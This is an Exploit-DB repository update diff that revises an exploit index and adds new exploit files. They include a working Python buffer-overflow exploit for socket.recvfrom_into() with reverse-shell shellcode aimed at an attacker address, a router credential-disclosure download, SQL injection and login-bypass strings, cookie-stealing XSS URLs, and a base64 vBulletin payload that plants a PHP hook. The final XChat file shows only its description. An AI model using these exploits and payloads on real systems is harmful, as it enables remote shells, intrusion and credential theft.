Updated 02_27_2014

files.csv

@@ -10037,7 +10037,7 @@ id,file,description,date,author,platform,type,port
 10837,platforms/php/webapps/10837.txt,"Quick Poll (code.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
 10838,platforms/php/webapps/10838.txt,"list Web (addlink.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
 10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip (store_info.php id) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0
-10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 - Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0
+10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 (.asx) - Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0
 10841,platforms/php/webapps/10841.pl,"pL-PHP <= beta 0.9 - Local File Include Exploit",2009-12-31,"cr4wl3r ",php,webapps,0
 10842,platforms/windows/dos/10842.py,"SimplePlayer 0.2 - (.wav) overflow DoS Exploit (0day)",2009-12-31,mr_me,windows,dos,0
 10844,platforms/php/webapps/10844.txt,"Joomla Component com_portfol SQL Injection Vulnerability",2009-12-31,"wlhaan hacker",php,webapps,0
@@ -10871,7 +10871,7 @@ id,file,description,date,author,platform,type,port
 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0
 11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 multi file include",2010-03-27,ITSecTeam,php,webapps,0
 11904,platforms/php/webapps/11904.txt,"68kb multi remote file include",2010-03-27,ITSecTeam,php,webapps,0
-11905,platforms/php/webapps/11905.txt,"Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0
+11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0
 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities.",2010-03-27,"cp77fk4r ",php,webapps,0
 11908,platforms/php/webapps/11908.txt,"Joomla Component com_solution SQL Injection Vulnerability",2010-03-27,"DevilZ TM",php,webapps,0
 11909,platforms/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 - Local stack overflow exploit",2010-03-28,"Hazem mofeed",windows,local,0
@@ -11629,7 +11629,7 @@ id,file,description,date,author,platform,type,port
 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0
 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent (idproperty) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0
 12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit",2010-05-28,Dr_IDE,windows,dos,0
-12775,platforms/multiple/dos/12775.py,"VLC Media Player <= 1.0.6 - Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0
+12775,platforms/multiple/dos/12775.py,"VLC Media Player <= 1.0.6 (.avi) - Media File Crash PoC",2010-05-28,Dr_IDE,multiple,dos,0
 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability",2010-05-28,CoBRa_21,php,webapps,0
 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent (news.php) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0
 12779,platforms/php/webapps/12779.txt,"Joomla Component My Car Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
@@ -16203,7 +16203,7 @@ id,file,description,date,author,platform,type,port
 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 Memory Corruption",2012-04-19,shinnai,multiple,dos,0
 18755,platforms/windows/dos/18755.c,"MS11-046 Afd.sys Proof of Concept",2012-04-19,fb1h2s,windows,dos,0
 18756,platforms/multiple/dos/18756.txt,"OpenSSL ASN1 BIO Memory Corruption Vulnerability",2012-04-19,"Tavis Ormandy",multiple,dos,0
-18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 division by zero vulnerability",2012-04-19,"Senator of Pirates",windows,dos,0
+18757,platforms/windows/dos/18757.txt,"VLC 2.0.1 (.mp4) - Crash PoC",2012-04-19,"Senator of Pirates",windows,dos,0
 18758,platforms/multiple/dos/18758.txt,"Wireshark 'call_dissector()' NULL Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0
 18759,platforms/windows/remote/18759.rb,"TFTP Server for Windows 1.4 ST WRQ Buffer Overflow",2012-04-20,metasploit,windows,remote,0
 18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0
@@ -19137,7 +19137,7 @@ id,file,description,date,author,platform,type,port
 21886,platforms/php/webapps/21886.txt,"Py-Membres 3.1 Index.PHP Unauthorized Access Vulnerability",2002-10-02,frog,php,webapps,0
 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0
 21888,platforms/windows/remote/21888.rb,"KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",2012-10-11,metasploit,windows,remote,0
-21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0
+21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 (.png) - ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0
 21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0
 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0
 21892,platforms/windows/local/21892.txt,"FileBound 6.2 Privilege Escalation Vulnerability",2012-10-11,"Nathaniel Carew",windows,local,0
@@ -20413,7 +20413,7 @@ id,file,description,date,author,platform,type,port
 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
 23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0
 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow Vulnerability",2003-09-30,"Luigi Auriemma",linux,dos,0
-23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 Crash PoC",2012-12-07,coolkaveh,windows,dos,0
+23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 (.swf) - Crash PoC",2012-12-07,coolkaveh,windows,dos,0
 23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 Multiple CSRF Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0
 23203,platforms/windows/remote/23203.rb,"IBM System Director Agent DLL Injection",2012-12-07,metasploit,windows,remote,0
 23204,platforms/linux/local/23204.c,"Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun Vulnerability",2003-09-30,demz,linux,local,0
@@ -28663,6 +28663,7 @@ id,file,description,date,author,platform,type,port
 31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
 31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 PNM File Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0
 31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0
+31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,@sha0coder,linux,remote,0
 31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0
 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
@@ -28681,3 +28682,16 @@ id,file,description,date,author,platform,type,port
 31891,platforms/asp/webapps/31891.txt,"Real Estate Website 1.0 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps,0
 31892,platforms/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 'p' Parameter Cross Site Scripting Vulnerability",2008-06-10,Unohope,cgi,webapps,0
 31893,platforms/php/webapps/31893.txt,"Hot Links SQL-PHP Multiple Cross Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps,0
+31894,platforms/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80
+31896,platforms/hardware/webapps/31896.txt,"WiFiles HD 1.3 iOS - File Inclusion Vulnerability",2014-02-25,Vulnerability-Lab,hardware,webapps,8080
+31898,platforms/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection Vulnerability",2014-02-25,Hurley,php,webapps,80
+31901,platforms/multiple/remote/31901.txt,"Sun Glassfish 2.1 'name' Parameter Cross Site Scripting Vulnerability",2008-06-10,"Eduardo Neves",multiple,remote,0
+31902,platforms/php/webapps/31902.txt,"Noticia Portal 'detalle_noticia.php' SQL Injection Vulnerability",2008-06-10,t@nzo0n,php,webapps,0
+31903,platforms/linux/remote/31903.asm,"NASM 2.0 'ppscan()' Off-By-One Buffer Overflow Vulnerability",2008-06-21,"Philipp Thomas",linux,remote,0
+31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0
+31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 admin/login.php username Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0
+31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 last_records.php annuaire Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0
+31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 annuaire.php Multiple Parameter XSS",2008-06-11,"Sylvain THUAL",php,webapps,0
+31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0
+31909,platforms/windows/remote/31909.html,"XChat 2.8.7b 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0
+31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0

platforms/hardware/webapps/31894.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Technicolor TC7200: Authentication Bypass
+# Google Dork: N/A
+# Date: 24-02-2014
+# Exploit Author: Jeroen - IT Nerdbox
+# Vendor Homepage: http://www.technicolor.com/
+# Software Link: http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways/cable-modems-gateways/tc7200-tc7300
+# Version: STD6.01.12
+# Tested on: N/A
+# CVE : CVE-2014-1677
+#
+
+## Description:
+#
+# Any user on the internal network can download a backup configuration file without authenticating first. The backup file contains
+# the credentials to the administrative web interface.
+#
+## PoC:
+#
+# Download the file: http://192.168.0.1/goform/system/GatewaySettings.bin
+# 
+# Using the command: $ hexedit -C GatewaySettings.bin
+#
+# 00006590  00 00 00 00 00 00 00 00  30 4d 4c 6f 67 00 06 00 |........0MLog...|
+# 000065a0  05 61 64 6d 69 6e 00 15  6d 79 73 75 70 65 72 73 |.admin..mysupers|
+# 000065b0  65 63 72 65 74 70 61 73  73 77 6f 72 64 00 06 75 |ecretpassword..u|
+# 000065c0  70 63 63 73 72 00 00                             |pccsr..|
+# 000065c7
+#
+# 
+
+# More information can be found at:http://www.nerdbox.it/technicolor-tc7200-auth-bypass-dos/

platforms/hardware/webapps/31896.txt

@@ -0,0 +1,186 @@
+Document Title:
+===============
+WiFiles HD v1.3 iOS - File Include Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1214
+
+
+Release Date:
+=============
+2014-02-22
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1214
+
+
+Common Vulnerability Scoring System:
+====================================
+7.1
+
+
+Product & Service Introduction:
+===============================
+WiFiles HD for iPad is an easy to use file storage/sharing app. Transfer files using wifi or iTunes File Transfer to & from your Mac/PC with ease.
+Updated- transfer files in background now supported. Store movies, photos, music, and any other file you wish. In app filesharing supports opening 
+files in supporting third party apps.
+
+( Copy of the Homepage: https://itunes.apple.com/us/app/wifiles-hd/id436227200 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official Mr Burns - WiFiles HD v1.4 iOS mobile web-application. 
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-02-22:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Apple AppStore
+Product: WiFiles HD - iOS Web Server & Web Application 1.3
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A local file include vulnerability has been discovered in the official WiFiles HD v1.4 iOS mobile web-application. 
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests 
+or system specific path commands to compromise the web-application/device.
+
+The vulnerability is located in the upload module of the mobile web-application interface. Remote attackers can 
+manipulate the `upload > submit` POST method request with the vulnerable `filename` value to compromise the application 
+or connected device components. 
+
+The issue allows remote attackers to include local app path values or wifi web-server files. The exploitation appears 
+on the application-side and the inject request method is POST. The exection occurs in the main index file dir list. 
+The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability 
+scoring system) count of 7.0(+)|(-)7.1.
+
+Exploitation of the local file include vulnerability requires no user interaction or privileged mobile application user account. 
+Successful exploitation of the file include web vulnerability results in mobile application compromise, connected device compromise 
+or web-server compromise.
+
+Request Method(s):
+				[+] POST
+
+Vulnerable Module(s):
+				[+] Upload
+
+Vulnerable Procedure(s):
+				[+] Submit
+
+Vulnerable Parameter(s):
+				[+] filename
+
+Affected Module(s):
+				[+] File Dir Index Listing (http://localhost:8080)
+
+
+Proof of Concept (PoC):
+=======================
+The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
+For security demonstration or to reproduce the file include web vulnerability follow the provided information and steps below to continue.
+
+PoC: Exploit - filename
+
+<html><head><title>Files from WiFiles HD</title><style>html {background-color:#000000} body 
+{ background-color:#96969b; font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:18x; margin-left:15%; 
+margin-right:15%; border:3px groove #006600; padding:15px; } </style></head><body><h1> WiFiles HD:</h1>
+<bq>Please do not leave this page until transfers are complete.
+Refresh the page before attempting to transfer files if you close the server in WiFiles HD.
+</bq><p style="color:white"><a href="137.png">137.png</a>		
+(   279.0 Kb, 2014-02-22 14:04:01 +0000)<br>
+<a href="e4c167621c2e61.jpg">e4c167621c2e61.jpg</a>		
+(    23.8 Kb, 2014-02-22 14:04:10 +0000)<br>
+<a href="<iframe src=a>"><./<[LOCAL FILE INCLUDE VULNERABILITY!]>"></a>		
+(    23.8 Kb, 2014-02-22 14:09:20 +0000)<br />
+</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label><input type="file" name="file" id="file" /></label>
+<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p></body></html>
+
+
+--- PoC Session Logs [POST] ---
+
+04:02:59.326[191ms][total 1633ms] Status: 200[OK]
+POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Gr??e des Inhalts[1056] Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8080/]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------213382078724824
+Content-Disposition: form-data; name="file"; filename="./<[LOCAL FILE INCLUDE VULNERABILITY!]>"
+Content-Type: image/jpeg
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure encode, parse and restriction of the vulnerable filename value in the upload POST method request.
+
+
+Security Risk:
+==============
+The security risk of the local file include web vulnerability is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+

platforms/linux/remote/31875.py

@@ -0,0 +1,94 @@
+#!/usr/bin/env python
+
+'''
+# Exploit Title: python socket.recvfrom_into() remote buffer overflow
+# Date: 21/02/2014
+# Exploit Author: @sha0coder
+# Vendor Homepage: python.org
+# Version: python2.7 and python3
+# Tested on: linux 32bit + python2.7
+# CVE : CVE-2014-1912
+
+
+
+socket.recvfrom_into() remote buffer overflow Proof of concept
+by @sha0coder
+
+TODO: rop to evade stack nx 
+
+
+(gdb) x/i $eip
+=> 0x817bb28:	mov    eax,DWORD PTR [ebx+0x4]       <--- ebx full control => eax full conrol
+   0x817bb2b:	test   BYTE PTR [eax+0x55],0x40
+   0x817bb2f:	jne    0x817bb38 -->
+   ...
+   0x817bb38:	mov    eax,DWORD PTR [eax+0xa4]      <--- eax full control again
+   0x817bb3e:	test   eax,eax
+   0x817bb40:	jne    0x817bb58 -->
+   ...
+   0x817bb58:	mov    DWORD PTR [esp],ebx
+   0x817bb5b:	call   eax <--------------------- indirect fucktion call ;)
+
+
+$ ./pyrecvfrominto.py 
+	egg file generated
+
+$ cat egg | nc -l 8080 -vv
+
+... when client connects ... or wen we send the evil buffer to the server ...
+
+0x0838591c in ?? ()
+1: x/5i $eip
+=> 0x838591c:	int3    			<--------- LANDED!!!!!
+   0x838591d:	xor    eax,eax
+   0x838591f:	xor    ebx,ebx
+   0x8385921:	xor    ecx,ecx
+   0x8385923:	xor    edx,edx
+
+'''
+
+import struct
+
+def off(o):
+	return struct.pack('L',o)
+
+
+reverseIP = '\xc0\xa8\x04\x34'   #'\xc0\xa8\x01\x0a'
+reversePort = '\x7a\x69'
+
+
+#shellcode from exploit-db.com, (remove the sigtrap)
+shellcode = "\xcc\x31\xc0\x31\xdb\x31\xc9\x31\xd2"\
+			"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"\
+			"\x01\x6a\x02\x89\xe1\xcd\x80\x89"\
+			"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"+\
+			reverseIP+"\x66\x68"+reversePort+"\x66\x53\xfe"\
+			"\xc3\x89\xe1\x6a\x10\x51\x56\x89"\
+			"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"\
+			"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"\
+			"\xc0\x52\x68\x6e\x2f\x73\x68\x68"\
+			"\x2f\x2f\x62\x69\x89\xe3\x52\x53"\
+			"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"\
+			"\x80"
+
+
+shellcode_sz = len(shellcode)
+
+print 'shellcode sz %d' % shellcode_sz
+
+
+ebx =  0x08385908
+sc_off = 0x08385908+20
+
+padd = 'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMM'
+
+'''           
+        +------------+----------------------+         +--------------------+
+        |            |                      |         |                    |
+        V            |                      |         V                    |
+'''
+buff = 'aaaa' + off(ebx) + 'aaaaaAAA'+ off(ebx) + shellcode + padd + off(sc_off)  # .. and landed ;)
+
+
+print 'buff sz: %s' % len(buff)
+open('egg','w').write(buff)

platforms/multiple/remote/31901.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29646/info
+
+Sun Glassfish is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert(&#039;DSecRG_XSS&#039;)>&configName=server-config

platforms/php/webapps/31898.txt

@@ -0,0 +1,9 @@
+# Exploit Title: Sendy SqlInject
+# Date: 2014-02-24
+# Exploit Author: Hurley
+# Vendor Homepage: http://sendy.co/
+# Software Link: http://sendy.co/
+# Version: 1.1.8.4
+
+Demo page:
+http://server/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

platforms/php/webapps/31902.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/29655/info
+
+Noticia Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/detalle_noticia.php?id_noticia=[SQL] 

platforms/php/webapps/31904.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29659/info
+
+PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHPEasyData 1.5.4 is vulnerable; other versions may also be affected.
+
+http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,user_access%20from%20an_users

platforms/php/webapps/31905.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/29659/info
+ 
+PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+PHPEasyData 1.5.4 is vulnerable; other versions may also be affected.
+
+-admin/login.php
+Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login:
+' or 1=1-- /**

platforms/php/webapps/31906.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29659/info
+  
+PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+PHPEasyData 1.5.4 is vulnerable; other versions may also be affected.
+
+http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E

platforms/php/webapps/31907.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/29659/info
+   
+PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+   
+PHPEasyData 1.5.4 is vulnerable; other versions may also be affected.
+
+http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
+
+http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E

platforms/php/webapps/31908.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29662/info
+
+Flat Calendar is prone to multiple authentication-bypass vulnerabilities because it fails to perform adequate authentication checks.
+
+An attacker can exploit these issues to gain unauthorized access to the application and make arbitrary changes to its configuration. This may lead to further attacks.
+
+Flat Calendar 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/calender_path/admin/add.php
+http://www.example.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid]
+
+

platforms/php/webapps/31910.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/29704/info
+
+vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+vBulletin 3.7.1 and 3.6.10 are vulnerable; other versions may also be affected.
+
+http://www.example.com/vB3/admincp/index.php?redirect={XSS}
+http://www.example.com/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
+http://www.example.com/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3Rv
+

platforms/windows/remote/31909.html

@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/29696/info
+
+XChat is prone to a vulnerability that allows remote attackers to execute arbitrary commands in the context of the vulnerable user. This issue may lead to a remote compromise.
+
